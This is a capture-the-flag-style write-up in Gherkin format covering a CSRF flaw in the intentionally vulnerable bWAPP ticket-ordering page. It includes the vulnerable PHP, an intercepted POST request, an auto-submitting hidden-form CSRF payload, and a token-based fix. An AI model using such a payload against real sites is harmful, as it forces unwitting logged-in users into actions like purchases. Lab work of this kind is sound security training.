## Version 1.4.0
## language: en

Feature:
  TOE:
    bWAPP
  Category
    A4 - Insecure Direct Object References
  Page name:
    bWAPP/insecure_direct_object_ref_2.php
  CWE:
    CWE-352: XSRF
  Goal:
    Forge a malicious request and execute it with a logged user
  Recommendation:
    Implement CSRF tokens

  Background:
  Hacker's software:
    | <Name>                       | <Version>          |
    | Kali GNU/Linux               | 4.18.0-kali1-amd64 |
    | Firefox Quantum              | 60.2.0             |
    | Burp Suite Community Edition | 1.7.36             |
  TOE information:
    Given I am accessing the site bWAPP/insecure_direct_object_ref_2.php
    And enter a php site that allows me to order movie tickets
    And the site is running on bee-box 1.6.7 in Virtualbox 5.2.18:
    """
    Ubuntu 8.04, kernel=2.6.24-16-generic, MySQL 5.0.99, Apache 2.2.8, PHP 5.2.4
    """
    And the site is running on low security_level


  Scenario: Normal use case
  Ordering tickets
    Given I access the site
    And I see a screen that allows me to select the number of tickets I want
    And fill the textfield for number of tickets with 5
    And click on "confirm"
    Then I get the following output:
    """
    You ordered 5 movie tickets.

    Total amount charged from your account automatically: 75 EUR.

    Thank you for your order!
    """

  Scenario: Static detection
  The code does not implement CSRF validation like CSRF tokens
    When I look at the code on bWAPP/insecure_direct_object_ref_2.php
    Then I can see the vulnerability from lines 108 to 122
    And it is caused due to the lack of a anti CSRF validations
    """
    108  if(isset($_REQUEST["ticket_quantity"])) {
    109      if($_COOKIE["security_level"] != "2") {
    110          if(isset($_REQUEST["ticket_price"])) {
    111              $ticket_price = $_REQUEST["ticket_price"];
    112          }
    113      }
    114      $ticket_quantity = abs($_REQUEST["ticket_quantity"]);
    115      $total_amount = $ticket_quantity * $ticket_price;
    116
    117      echo "<p>You ordered <b>" . $ticket_quantity . \
             "</b> movie tickets.</p>";
    118      echo "<p>Total amount charged from your \
             account automatically: <b>" . $total_amount . " EUR</b>.</p>";
    119      echo "<p>Thank you for your order!</p>";
    120
    121      $_SESSION["amount"] = $_SESSION["amount"] - $total_amount;
    122  }
    """
    Then bulding a CSRF script for ordering tickets is possible

  Scenario: Dynamic detection
  Validation token missing
    Given I am listening with Burp
    And I access the site
    And order 5 tickets
    Then I intercept the following request:
    """
    POST /bWAPP/insecure_direct_object_ref_2.php HTTP/1.1
    ... #Unimportant lines
    Content-Type: application/x-www-form-urlencoded
    ... #Unimportant lines
    Cookie: security_level=0; has_js=1; \
    PHPSESSID=45656538d8981d20117e052ada614980
    ... #Unimportant lines
    ticket_quantity=5&ticket_price=15&action=order
    """
    Then I can conclude that no token parameter is being required for the POST
    And building a CSRF script for ordering tickets is possible

  Scenario: Exploitation
  Sending a link to a bWAPP user and making him purchase tickets for me
    Given I already know I can build a CSRF attack
    Then I proceed to build the following script:
    """
    <body onload="document.forms[0].submit()">
      <form method="POST" enctype="application/x-www-form-urlencoded"
      action="http://192.168.56.101/bWAPP/insecure_direct_object_ref_2.php"/>
        <input type="hidden" name="ticket_quantity" value="5" />
        <input type="hidden" name="ticket_price" value="15" />
        <input type="hidden" name="action" value="order" />
    </body>
    """
    And save my malicious script in "jsfiddle.net"
    And get a link for executing in "http://jsfiddle.net/8htk2357/16/"
    Then I send the link to a victim which in this case will be myself
    When I open the malicious link logged as bee
    Then I get instantly redirected to the bWAPP site
    And the followin message is already there:
    """
    You ordered 5 movie tickets.

    Total amount charged from your account automatically: 75 EUR.

    Thank you for your order!
    """
    Then I can conclude that the malicious link executed de script
    And redirected me to bWAPP
    And automatically ordered tickets for me
    And I would be able to make any user to order tickets for me

  Scenario: Remediation
  Implementing CSRF tokens
    Given I know that insecure_direct_object_ref_2.php is vulnerable to CSRFs
    Then I create two functions in /var/www/bWAPP/functions_external.php:
    """
    622  function get_csrf_token() {
    623      if(isset($_SESSION['token'])) {
    624          return $_SESSION['token'];
    625      } else {
    626          $token = bin2hex(openssl_random_pseudo_bytes(16));
    627          $_SESSION['token'] = $token;
    628          return $token;
    629      }
    630  }
    631
    632  function validate_csrf_token($token) {
    633      if ($token == get_csrf_token()) {
    634          return true;
    635      } else {
    636          return false;
    637      }
    638  }
    """
    Then these functions will allow me to create and validate tokens in the blog
    Then I modify the code in /var/www/bWAPP/insecure_direct_object_ref_2.php
    And create an "$original_token" value on line 108
    And such value that stores a token when the user visits the blog
    And try to create an "$inserted_token" from lines 109 to 111
    And such value comes from any POST request made to the blog
    And create an additional HTML input on line 83 for POST requests
    And such input creates a new token if there is none or recycles the old one
    Then I create a condition on lines 119 to 121
    And such condition checks if "$original_token" and "$inserted_token" differ
    Then if they differ it means that the user never went through the blog
    And never obtained an "$original_token"
    Then the POST request is likely to be a CSRF attack
    And the POST request is invalidated
    """
    81  <form action="<?php echo($_SERVER["SCRIPT_NAME"]);?>" method="POST">
    82
    83      <input type="hidden" name="token" \
            value="<?php echo get_csrf_token(); ?>"/>
    ... #Unimportant lines
    108  $original_token = get_csrf_token();
    109  if(isset($_REQUEST["token"])) {
    110      $inserted_token = $_REQUEST["token"];
    111  }
    112
    113  if(isset($_REQUEST["ticket_quantity"])) {
    114      if($_COOKIE["security_level"] != "2") {
    115          if(isset($_REQUEST["ticket_price"])) {
    116              $ticket_price = $_REQUEST["ticket_price"];
    117          }
    118      }
    119      if (! validate_csrf_token($inserted_token)) {
    120          echo "<font color=\"red\">CSRF Detected and stopped.</font>";
    121      }
    122      else {
    123          $ticket_quantity = abs($_REQUEST["ticket_quantity"]);
    124          $total_amount = $ticket_quantity * $ticket_price;
    125
    126          echo "<p>You ordered <b>" . $ticket_quantity . \
                 "</b> movie tickets.</p>";
    127          echo "<p>Total amount charged from your account \
                 automatically: <b>" . $total_amount . " EUR</b>.</p>";
    128          echo "<p>Thank you for your order!</p>";
    129
    130          $_SESSION["amount"] = $_SESSION["amount"] - $total_amount;
    131      }
    132  }
    """
    Then after making all these changes
    Then I try the previous malicious script for changing secrets
    And get the following message:
    """
    CSRF Detected and stopped.
    """
    And the script fails to order the tickets
    Then I also try to manually order tickets as a normal user would do
    And it works correctly
    Then the the vulnerability is patched and CSRF attacks are not possible

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    4.2/10 (Medium) - AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.1/10 (Medium) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    3.0/10 (Low) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2018-11-15
